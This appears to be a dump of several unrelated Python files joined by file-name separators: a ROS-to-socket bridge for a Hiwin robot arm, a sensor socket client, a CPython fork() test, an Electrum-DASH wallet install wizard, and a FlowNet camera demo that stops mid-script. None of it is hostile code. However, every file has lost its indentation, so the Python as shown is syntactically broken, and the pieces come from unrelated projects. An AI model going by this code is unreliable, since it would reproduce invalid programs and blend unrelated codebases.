self._players[Player] = None # This contrivance introduces a delay such that we're less likely to re-register a closing player.
|
Hiwin_socket_ros_20190521121514.py
|
#!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import Hiwin_socket_TCPcmd as TCP
import Hiwin_socket_Taskcmd as Taskcmd
import talker as talk
import enum
data = '0' #設定傳輸資料初始直
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
##------------class pos-------
class pos():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server -------
##--------touch strategy--------###
def point_data(req):
global client_response
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req):
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
return(1)
##--------touch strategy end--------###
def socket_server():
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect(('192.168.0.1', 8080))#iclab 5
s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
start_input=int(input('開始傳輸請按1,離開請按3 : '))
#start_input = 1
if start_input==1:
while 1:
##---------------socket 傳輸手臂命令-----------------
for case in switch(socket_cmd.action):
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
socket_cmd.action= 5
s.send(data.encode('utf-8'))#socket傳送for python to translate str
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
###test 0403
if str(feedback_str[2]) == '70':# F
feedback = 0
socket_client_arm_state(feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T
feedback = 1
socket_client_arm_state(feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6
feedback = 6
socket_client_arm_state(feedback)
print("shutdown")
#Hiwin test 20190521
feedback = 0
#Hiwin test 20190521
Arm_feedback = TCP.Is_busy(feedback)
###test 0403
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5
t = threading.Thread(target=thread_test)
t.start()
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line
|
RTTclient.py
|
import socket
import time
import random
import numpy as np
import serial
import random
import logging
import multiprocessing as mp
from queue import Queue
import traceback
import re
import csv
class WarpConnectorClass(object):
#TODO: Need to impliment exception handling at each socket use
dataBuffer = [0,0,0,0,0,0]
exitProgMode = False
lastSend = ''
tempStringBuffer = ""
recvdData = ""
sampleLimit = 10
readCount = 0
autoReadEnabled = True
endTag = "Enter selection>"
progRead = False
warpConnected = False
logger = mp.get_logger()
HOST = '127.0.0.1' # Standard loopback interface address (localhost)
PORT = 19021 # Port to listen on (non-privileged ports are > 1023)
def __init__(self): #thread initialisation
self.warpSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.conectionType = "serial"
self._running = True
def terminate(self):
self.logger.debug("Termination Handle called")
self._running = False
def run(self,warpAtMenu,dataQueue, dataReady, uInputQueue):
while not self.warpConnected:
try :
warpConnectionHandle = self.warpSocket.connect((self.HOST, self.PORT))
self.warpConnected = True
except Exception as e:
self.warpConnected = False
self.logger.error(e)
self.logger.debug(traceback.format_exc())
time.sleep(2)
uInput = ""
while self._running:
self.logger.debug("# - waiting for data")
data = self.warpSocket.recv(1024)
if not data:
break
# conn.sendall(data)
else :
# dataReady.set()
# print(data[len(data)- len(self.endTag):])
print("# (", len(data.decode('ascii')), ") : ", data.decode('ascii'))
# self.logger.error("# - %s", data.decode('ascii'))
# print("test = ", data.decode('ascii')[1:8])
if (re.search(r'progExit',data.decode('ascii')) != None):
self.logger.debug("progExit match!")
self.exitProgMode = False
# if (data[len(data)- len(self.endTag):].decode('ascii') == self.endTag):
rePattern = r'.*' + re.escape(self.endTag) + r'.*'
if (re.search(rePattern,data.decode('ascii')) != None):
self.logger.debug("End matched! -> Menu load completed!")
warpAtMenu.set()
# self.exitProgMode = False
if(warpAtMenu.is_set()):
# self.exitProgMode = False
self.logger.debug("Waiting for user input")
uInput = uInputQueue.get()
self.logger.debug("User input = %s", uInput)
if uInput == "#":
warpAtMenu.clear()
self.autoReadEnabled = True
self.logger.debug("Entering Programatic read mode!")
self.warpSocket.send('#9'.encode('ascii'))
self.lastSend = '#9'
self.progRead = True
else:
warpAtMenu.clear()
self.warpSocket.send(uInput.encode('ascii'))
self.lastSend = uInput
if (self.progRead and (self.readCount < self.sampleLimit)):
reAS7262 = re.search(r'AS7262:', data.decode('ascii'))
if (reAS7262 != None):
# if (data == b'\r\nAS7262:'):
# _ = self.warpSocket.recv(1)
# dataBuffer = []
self.dataBuffer = [0,0,0,0,0,0]
# print("Data Read Begin")
self.recvdData = self.warpSocket.recv(1)
while self.recvdData.decode('ascii') != '\n':
self.tempStringBuffer += self.recvdData.decode('ascii')
self.recvdData = self.warpSocket.recv(1)
self.logger.debug("data = %s size = %d", self.tempStringBuffer, len(self.tempStringBuffer))
if len(self.tempStringBuffer) == 35:
tempDataList = self.tempStringBuffer.split(',')
for x in range(0,12,2):
try:
self.dataBuffer[int(x/2)] = int(tempDataList[x]+tempDataList[x+1],16)
dataReady.set()
except Exception as e:
self.logger.error("Error - %s", e)
self.warpSocket.send('~'.encode('ascii'))
self.lastSend = '~'
self.tempStringBuffer = ""
if dataReady.is_set():
self.readCount += 1
self.logger.info("AS7262 Sample : %d - sending data = %s", self.readCount, self.dataBuffer)
try:
dataQueue.put(self.dataBuffer)
# writeData(self.dataBuffer) ######
except Exception as e:
self.logger.error("Error - %s", e)
dataReady.clear()
if (self.readCount >= self.sampleLimit):
self.logger.debug("Read limit reached")
self.exitProgMode = True
self.autoReadEnabled = False
self.progRead = False
warpAtMenu.clear()
self.readCount = 0
if self.exitProgMode and not warpAtMenu.is_set() and self.lastSend != '&':
self.logger.debug("Exiting programatic read mode")
self.lastSend = '&'
self.warpSocket.send('&'.encode('ascii'))
self.warpConnected = False
self.warpSocket.shutdown()
self.warpSocket.close()
class DataCollectorClass(object):
logToFIle = True
dataFilePrefix = "temp"
def __init__(self): #thread initialisation
self._running = True
self.dataFileName = self.dataFilePrefix + str(time.time()) + '.csv'
def terminate(self):
self._running = False
def run(self, dataQueue, dataReady, logDataToFile, logDataToUI):
# uiCon = serial.Serial('COM7', 19200)
logger = mp.get_logger()
while self._running:
try:
d = dataQueue.get()
if logDataToFile:
with open(self.dataFileName, 'a', newline='') as dataFile:
spamWrite = csv.writer(dataFile, quotechar='|', quoting=csv.QUOTE_MINIMAL)
spamWrite.writerow([time.time()] + d)
if logDataToUI:
pass
except Exception as e:
logger.error("Error - %s", e)
def writeData(self, dataList):
self.uiCon.write("#".encode('ascii')) # 0
# Time
self.uiCon.write(str(time.ctime() + ',').encode('ascii'))
# Ultrasonic data
self.uiCon.write((str(dataList[0]) + ",").encode('ascii')) # V
self.uiCon.write((str(dataList[1]) + ",").encode('ascii')) # b
self.uiCon.write((str(dataList[2]) + ",").encode('ascii')) # g
self.uiCon.write((str(dataList[3]) + ",").encode('ascii')) # y
self.uiCon.write((str(dataList[4]) + ",").encode('ascii')) # o
self.uiCon.write(str(dataList[5]).encode('ascii')) # r
self.uiCon.write("\n".encode('ascii'))
#WIP FAO-JASON
class sensorCharacterisationClass(DataCollectorClass):
dataFileName = "data.csv"
def run(self, dataQueue, dataReady):
logger = mp.get_logger()
while self._running:
try:
d = dataQueue.get()
logger.warn("Data Recieved = %s", d)
with open(self.dataFileName, 'a') as dataFile:
spamWrite = csv.writer(dataFile) #, delimiter=',',quotechar='|', quoting=csv.QUOTE_MINIMAL)
spamWrite.writerow(d)
except Exception as e:
logger.error("Error - %s", e)
if __name__ == "__main__":
# warpAtMenu = False
# self.progRead = False
terminateFlag = False
logDataToFile = True
logDataToUI = False
mpManager = mp.Manager()
mpLock = mp.Lock()
processList = []
mp.log_to_stderr()
logger = mp.get_logger()
logger.setLevel(logging.INFO)
warpAtMenu = mp.Event()
warpDataReady = mp.Event()
warpAtMenu.clear()
# userInput = mp.sharedctypes.Array('c',b'',lock=mpLock)
dataQueueToUI = mp.Queue()
uInputQueue = mp.Queue()
warpConnectorInstance = WarpConnectorClass()
dataCollectorInstance = DataCollectorClass()
warpConnectorProcess = mp.Process(target = warpConnectorInstance.run, args=(warpAtMenu,dataQueueToUI, warpDataReady, uInputQueue),name="Warp")
dataCollectorProcess = mp.Process(target = dataCollectorInstance.run, args=(dataQueueToUI, warpDataReady, logDataToFile, logDataToUI),name="UI")
dataCollectorProcess.start()
processList.append(dataCollectorProcess)
warpConnectorProcess.start()
processList.append(warpConnectorProcess)
while not terminateFlag:
uInput = input()
if uInput == "&":
terminateFlag = True
elif (uInput != " ") and (uInput != "\n") and (uInput != "\r") and (uInput != "\r\n") and (uInput != ""):
uInputQueue.put(uInput)
else:
print("Invalid input")
# time.sleep(15)
for p in processList:
p.terminate()
for p in processList:
p.join()
|
test_fork1.py
|
"""This test checks for correct fork() behavior.
"""
import _imp as imp
import os
import signal
import sys
import time
from test.fork_wait import ForkWait
from test.support import (reap_children, get_attribute,
import_module, verbose)
threading = import_module('threading')
# Skip test if fork does not exist.
get_attribute(os, 'fork')
class ForkTest(ForkWait):
def wait_impl(self, cpid):
deadline = time.monotonic() + 10.0
while time.monotonic() <= deadline:
# waitpid() shouldn't hang, but some of the buildbots seem to hang
# in the forking tests. This is an attempt to fix the problem.
spid, status = os.waitpid(cpid, os.WNOHANG)
if spid == cpid:
break
time.sleep(0.1)
self.assertEqual(spid, cpid)
self.assertEqual(status, 0, "cause = %d, exit = %d" % (status&0xff, status>>8))
def test_threaded_import_lock_fork(self):
"""Check fork() in main thread works while a subthread is doing an import"""
import_started = threading.Event()
fake_module_name = "fake test module"
partial_module = "partial"
complete_module = "complete"
def importer():
imp.acquire_lock()
sys.modules[fake_module_name] = partial_module
import_started.set()
time.sleep(0.01) # Give the other thread time to try and acquire.
sys.modules[fake_module_name] = complete_module
imp.release_lock()
t = threading.Thread(target=importer)
t.start()
import_started.wait()
pid = os.fork()
try:
# PyOS_BeforeFork should have waited for the import to complete
# before forking, so the child can recreate the import lock
# correctly, but also won't see a partially initialised module
if not pid:
m = __import__(fake_module_name)
if m == complete_module:
os._exit(0)
else:
if verbose > 1:
print("Child encountered partial module")
os._exit(1)
else:
t.join()
# Exitcode 1 means the child got a partial module (bad.) No
# exitcode (but a hang, which manifests as 'got pid 0')
# means the child deadlocked (also bad.)
self.wait_impl(pid)
finally:
try:
os.kill(pid, signal.SIGKILL)
except OSError:
pass
def test_nested_import_lock_fork(self):
"""Check fork() in main thread works while the main thread is doing an import"""
# Issue 9573: this used to trigger RuntimeError in the child process
def fork_with_import_lock(level):
release = 0
in_child = False
try:
try:
for i in range(level):
imp.acquire_lock()
release += 1
pid = os.fork()
in_child = not pid
finally:
for i in range(release):
imp.release_lock()
except RuntimeError:
if in_child:
if verbose > 1:
print("RuntimeError in child")
os._exit(1)
raise
if in_child:
os._exit(0)
self.wait_impl(pid)
# Check this works with various levels of nested
# import in the main thread
for level in range(5):
fork_with_import_lock(level)
def tearDownModule():
reap_children()
if __name__ == "__main__":
unittest.main()
|
installwizard.py
|
import sys
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
import electrum_dash
from electrum_dash.i18n import _
from seed_dialog import SeedDisplayLayout, SeedWarningLayout, SeedInputLayout
from network_dialog import NetworkChoiceLayout
from util import *
from password_dialog import PasswordLayout, PW_NEW, PW_PASSPHRASE
from electrum_dash.wallet import Wallet
from electrum_dash.mnemonic import prepare_seed
from electrum_dash.util import UserCancelled
from electrum_dash.wizard import (WizardBase,
MSG_ENTER_PASSWORD, MSG_RESTORE_PASSPHRASE,
MSG_COSIGNER, MSG_ENTER_SEED_OR_MPK,
MSG_SHOW_MPK, MSG_VERIFY_SEED,
MSG_GENERATING_WAIT)
def clean_text(seed_e):
text = unicode(seed_e.toPlainText()).strip()
text = ' '.join(text.split())
return text
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
import math
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, QtCore.Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, WizardBase):
def __init__(self, config, app, plugins):
QDialog.__init__(self, None)
self.setWindowTitle('Electrum-DASH - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.plugins = plugins
self.language_for_seed = config.get('language')
self.setMinimumSize(530, 370)
self.setMaximumSize(530, 370)
self.connect(self, QtCore.SIGNAL('accept'), self.accept)
self.title = WWLabel()
self.main_widget = QWidget()
self.cancel_button = QPushButton(_("Cancel"), self)
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(False))
self.cancel_button.clicked.connect(lambda: self.loop.exit(False))
self.next_button.clicked.connect(lambda: self.loop.exit(True))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addLayout(inner_vbox)
hbox.setStretchFactor(inner_vbox, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.cancel_button, self.next_button))
self.set_icon(':icons/electrum-dash.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def finished(self):
'''Ensure the dialog is closed.'''
self.accept()
self.refresh_gui()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60))
return prior_filename
def set_main_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.title.setText(title or "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.cancel_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
self.title.setVisible(False)
self.cancel_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def run(self, *args):
'''Wrap the base wizard implementation with try/except blocks
to give a sensible error message to the user.'''
wallet = None
try:
wallet = WizardBase.run(self, *args)
except UserCancelled:
self.print_error("wallet creation cancelled by user")
self.accept() # For when called from menu
except BaseException as e:
self.on_error(sys.exc_info())
raise
return wallet
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def request_seed(self, title, is_valid=None):
is_valid = is_valid or Wallet.is_any
slayout = SeedInputLayout()
def sanitized_seed():
return clean_text(slayout.seed_edit())
def set_enabled():
self.next_button.setEnabled(is_valid(sanitized_seed()))
slayout.seed_edit().textChanged.connect(set_enabled)
self.set_main_layout(slayout.layout(), title, next_enabled=False)
return sanitized_seed()
def show_seed(self, seed):
slayout = SeedWarningLayout(seed)
self.set_main_layout(slayout.layout())
def verify_seed(self, seed, is_valid=None):
while True:
r = self.request_seed(MSG_VERIFY_SEED, is_valid)
if prepare_seed(r) == prepare_seed(seed):
return
self.show_error(_('Incorrect seed'))
def show_and_verify_seed(self, seed, is_valid=None):
"""Show the user their seed. Ask them to re-enter it. Return
True on success."""
self.show_seed(seed)
self.app.clipboard().clear()
self.verify_seed(seed, is_valid)
def pw_layout(self, msg, kind):
playout = PasswordLayout(None, msg, kind, self.next_button)
self.set_main_layout(playout.layout())
return playout.new_password()
def request_passphrase(self, device_text, restore=True):
"""Request a passphrase for a wallet from the given device and
confirm it. restore is True if restoring a wallet. Should return
a unicode string."""
if restore:
msg = MSG_RESTORE_PASSPHRASE % device_text
return unicode(self.pw_layout(msg, PW_PASSPHRASE) or '')
def request_password(self, msg=None):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(msg or MSG_ENTER_PASSWORD, PW_NEW)
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On MacOSX they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.emit(QtCore.SIGNAL('synchronized'), msg)
self.connect(self, QtCore.SIGNAL('synchronized'), self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
def create_addresses(self, wallet):
def task():
wallet.synchronize()
self.emit(QtCore.SIGNAL('accept'))
t = threading.Thread(target = task)
t.start()
self.please_wait.setText(MSG_GENERATING_WAIT)
self.refresh_gui()
def query_create_or_restore(self, wallet_kinds):
"""Ask the user what they want to do, and which wallet kind.
wallet_kinds is an array of translated wallet descriptions.
Return a a tuple (action, kind_index). Action is 'create' or
'restore', and kind the index of the wallet kind chosen."""
actions = [_("Create a new wallet"),
_("Restore a wallet or import keys")]
title = _("Electrum could not find an existing wallet.")
actions_clayout = ChoicesLayout(_("What do you want to do?"), actions)
wallet_clayout = ChoicesLayout(_("Wallet kind:"), wallet_kinds)
vbox = QVBoxLayout()
vbox.addLayout(actions_clayout.layout())
vbox.addLayout(wallet_clayout.layout())
self.set_main_layout(vbox, title)
action = ['create', 'restore'][actions_clayout.selected_index()]
return action, wallet_clayout.selected_index()
def query_hw_wallet_choice(self, msg, action, choices):
actions = [_("Initialize a new or wiped device"),
_("Use a device you have already set up"),
_("Restore Electrum wallet from device seed words")]
default_action = 1 if action == 'create' else 2
actions_clayout = ChoicesLayout(_("What do you want to do?"), actions,
checked_index=default_action)
wallet_clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(actions_clayout.layout())
vbox.addLayout(wallet_clayout.layout())
self.set_main_layout(vbox)
self.next_button.setEnabled(len(choices) != 0)
if actions_clayout.selected_index() == 2:
action = 'restore'
else:
action = 'create'
return action, wallet_clayout.selected_index()
def request_many(self, n, xpub_hot=None):
vbox = QVBoxLayout()
scroll = QScrollArea()
scroll.setWidgetResizable(True)
scroll.setFrameShape(QFrame.NoFrame)
vbox.addWidget(scroll)
w = QWidget()
innerVbox = QVBoxLayout(w)
scroll.setWidget(w)
entries = []
if xpub_hot:
layout = SeedDisplayLayout(xpub_hot, title=MSG_SHOW_MPK, sid='hot')
else:
layout = SeedInputLayout(title=MSG_ENTER_SEED_OR_MPK, sid='hot')
entries.append(layout.seed_edit())
innerVbox.addLayout(layout.layout())
for i in range(n):
msg = MSG_COSIGNER % (i + 1) if xpub_hot else MSG_ENTER_SEED_OR_MPK
layout = SeedInputLayout(title=msg, sid='cold')
innerVbox.addLayout(layout.layout())
entries.append(layout.seed_edit())
def get_texts():
return [clean_text(entry) for entry in entries]
def set_enabled():
texts = get_texts()
is_valid = Wallet.is_xpub if xpub_hot else Wallet.is_any
all_valid = all(is_valid(text) for text in texts)
if xpub_hot:
texts.append(xpub_hot)
has_dups = len(set(texts)) < len(texts)
self.next_button.setEnabled(all_valid and not has_dups)
for e in entries:
e.textChanged.connect(set_enabled)
self.set_main_layout(vbox, next_enabled=False)
return get_texts()
def choose_server(self, network):
title = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfil the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
choices_title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(choices_title, choices)
self.set_main_layout(clayout.layout(), title)
auto_connect = True
if clayout.selected_index() == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.set_main_layout(nlayout.layout(), raise_on_cancel=False):
nlayout.accept()
auto_connect = False
self.config.set_key('auto_connect', auto_connect, True)
network.auto_connect = auto_connect
def query_choice(self, msg, choices):
clayout = ChoicesLayout(msg, choices)
self.set_main_layout(clayout.layout(), next_enabled=bool(choices))
return clayout.selected_index()
def query_multisig(self, action):
cw = CosignWidget(2, 2)
m_edit = QSpinBox()
n_edit = QSpinBox()
m_edit.setValue(2)
n_edit.setValue(2)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.valueChanged.connect(m_edit.setMaximum)
n_edit.valueChanged.connect(cw.set_n)
m_edit.valueChanged.connect(cw.set_m)
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Require')))
hbox.addWidget(m_edit)
hbox.addWidget(QLabel(_('of')))
hbox.addWidget(n_edit)
hbox.addWidget(QLabel(_('signatures')))
hbox.addStretch(1)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed "
"to unlock funds in your wallet:")))
vbox.addLayout(hbox)
self.set_main_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
wallet_type = '%dof%d'%(m,n)
return wallet_type
|
demo_local.py
|
# -*- coding: utf-8 -*-
# Copyright 2018 The Blueoil Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
import os
import sys
import cv2
import time
import math
import click
import imghdr
import imageio
import argparse
import threading
import collections
import numpy as np
import tensorflow as tf
from tensorflow.summary import FileWriter
from tensorflow.python.framework import graph_util
from .flownet_s import FlowNetS
from ..net import Mode
from ..training_schedules import LONG_SCHEDULE
from ..flow_to_image import flow_to_image, color_function
# from ..flowlib import flow_to_image
parser = argparse.ArgumentParser()
parser.add_argument('--restore_path', type=str, required=True)
args = parser.parse_args()
def init_camera(camera_height, camera_width, device_id=0):
cap = cv2.VideoCapture(device_id)
cap.set(cv2.CAP_PROP_FRAME_WIDTH, camera_width)
cap.set(cv2.CAP_PROP_FRAME_HEIGHT, camera_height)
cap.set(cv2.CAP_PROP_FPS, 10)
return cap
def rescale_frame(frame, ratio):
height = int(frame.shape[0] * ratio)
width = int(frame.shape[1] * ratio)
shape = (width, height)
return cv2.resize(frame, shape, interpolation=cv2.INTER_AREA)
if __name__ == '__main__':
# import matplotlib.pyplot as plt
# cmap = np.tile(np.linspace(0, 2 * np.pi, 1001), (1001, 1))
# plt.imshow(color_function(cmap).astype(np.uint8))
# plt.show()
# initializing camera
cap = init_camera(480, 640, 0)
# initializing worker and variables
diff_step = 10
frame_list = collections.deque(maxlen=300)
image_size = (384, 512, 3)
input_image = np.zeros(
(1, *image_size[:2], image_size[-1] * 2)).astype(np.uint8)
output_flow = np.zeros((1, *image_size[:2], 2))
output_image = np.zeros(image_size).astype(np.uint8)
for _ in range(diff_step):
frame_list.append(np.zeros(image_size).astype(np.uint8))
def _get_frame():
while True:
begin = time.time()
res, frame = cap.read()
assert res, "Something wrong occurs with camera!"
frame_list.append(rescale_frame(frame[:, ::-1, :], 0.8))
time.sleep(max(0.0, 1.0 / 30 - (time.time() - begin)))
# Create a new network
graph = tf.Graph()
with graph.as_default():
model = FlowNetS(mode=Mode.TEST)
training_schedule = LONG_SCHEDULE
images_placeholder, _ = model.placeholders()
input_op = {
'input_a': images_placeholder[..., :3],
'input_b': images_placeholder[..., 3:],
}
predictions = model.model(input_op, training_schedule)
output_op = predictions['flow']
init_op = tf.global_variables_initializer()
saver = tf.train.Saver()
session_config = tf.ConfigProto()
session_config.gpu_options.allow_growth = True
sess = tf.Session(graph=graph, config=session_config)
sess.run(init_op)
saver.restore(sess, args.restore_path)
def _inference():
time_list = collections.deque(maxlen=10)
while True:
begin = time.time()
input_image[0, ..., :3] = frame_list[-diff_step]
input_image[0, ..., 3:] = frame_list[-1]
feed_dict = {images_placeholder: input_image / 255.0}
output_flow[:] = sess.run(output_op, feed_dict=feed_dict)
output_image[:] = flow_to_image(-output_flow[0][..., [1, 0]])
time_list.append(time.time() - begin)
print("\033[KFPS: {:.3f}".format(
np.mean(1 / np.array(time_list))), end="\r")
t1 = threading.Thread(target=_get_frame)
